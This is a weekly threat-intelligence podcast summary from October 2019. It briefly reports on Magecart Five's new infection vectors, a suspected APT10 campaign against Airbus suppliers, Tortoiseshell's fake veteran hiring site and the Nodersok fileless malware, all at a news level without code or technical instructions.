Go Back

ShadowTalk Update – Magecart Five Widens Attack Vectors, Suspected Chinese Threat Actor Targets Airbus Suppliers, and Tortoiseshell Developments

October 4, 2019
ShadowTalk Update – Magecart Five Widens Attack Vectors, Suspected Chinese Threat Actor Targets Airbus Suppliers, and Tortoiseshell Developments

Coming to you from London this week, Jamie Collier, Philip Doherty, and Josh Poole join Viktoria Austin for our weekly threat intelligence updates. The team kicks off with a discussion around the top story of the week – Magecart Five Widens Attack Vectors.

Listen below 👇👇👇

Updates from this week’s Intelligence Summary

  • In the spotlight this week is a variety of new attack methods demonstrated by “Magecart Five”. The threat group is probably testing them out, and will highly likely implement the most successful methods in future operations. These developments highlight a broader trend related to members of the Magecart umbrella, which have evolved and integrated multiple new tactics, techniques, and procedures (TTPs) into their attacks during the past year.
  • Weekly highlights include: a suspected Chinese threat group, which may have been “APT10”, attacked European suppliers of aerospace company Airbus; the “Tortoiseshell” threat group targeted United States military veterans; and a newly identified malware variant, dubbed Nodersok, was detected.

 

Broader Magecart Five attack vectors could hit bigger victim base

Recent attacks by the Magecart Five threat group have incorporated previously unreported infection vectors. Among them are targeting public routers with malicious JavaScript files, injecting malicious code into an open-source app module, and distributing the “KPOT” information-stealing trojan via spamming services and watering hole attacks. The group is likely testing their new methods (against unnamed victims), intending to use those most successful in future operations. It is realistically possible that Magecart Five is either increasing the scale of its traditional card skimming activity or identifying new forms of attack vectors unrelated to skimming (or, potentially, a combination of the two). This activity highlights the group’s developing operational capability, as well as an overall trend of increasing sophistication seen in the groups belonging to the Magecart umbrella.

 

Suspected Chinese threat actor targets Airbus suppliers

A suspected Chinese cyber threat actor―APT 10 (aka Stone Panda) is a realistic possibility―targeted European suppliers of the aerospace company Airbus during the past 12 months, reportedly in an attempt to obtain commercial secrets. They conducted at least four attacks, targeting: technical documents linked to the certification process for Airbus aircraft, documents related to the turboprop engines used on the Airbus military plane A400M, the propulsion systems for the Airbus A350 passenger jet, and the avionics systems controlling that jet. Reporting did not provide extensive technical details, but did state that the attackers targeted the VPNs of supplier companies connected to the Airbus network.

 

Tortoiseshell lures American military-veteran job seekers

The threat actor Tortoiseshell targeted United States military veterans by creating a veteran hiring website that spoofed the legitimate United States Chamber of Commerce website. The illegitimate site prompted users to install a desktop application that contained malware. Tortoiseshell was recently reported to have targeted IT organizations in the Middle East; this latest incident indicates that the group has expanded to a wider range of sectors and geographies.

 

New Nodersok fileless malware attacks healthcare and other sectors in US, Europe

A recent attack campaign, affecting United States and European education, professional services, and healthcare victims, delivered the newly identified malware variant Nodersok. This is a type of fileless malware that uses LotL binaries to infect machines. Researchers suspect that malicious browser advertisements were used to distribute the malware. Once the payload was executed, Nodersok attempted to disable virus detection software. This incident highlights the growing popularity of fileless malware techniques during the past year.

 

For more details, read the full Weekly Intelligence Summary here:

Weekly Intelligence Summary 26 Sep - 03 Oct 2019

 

And to stay up to date with the latest from Digital Shadows, subscribe below.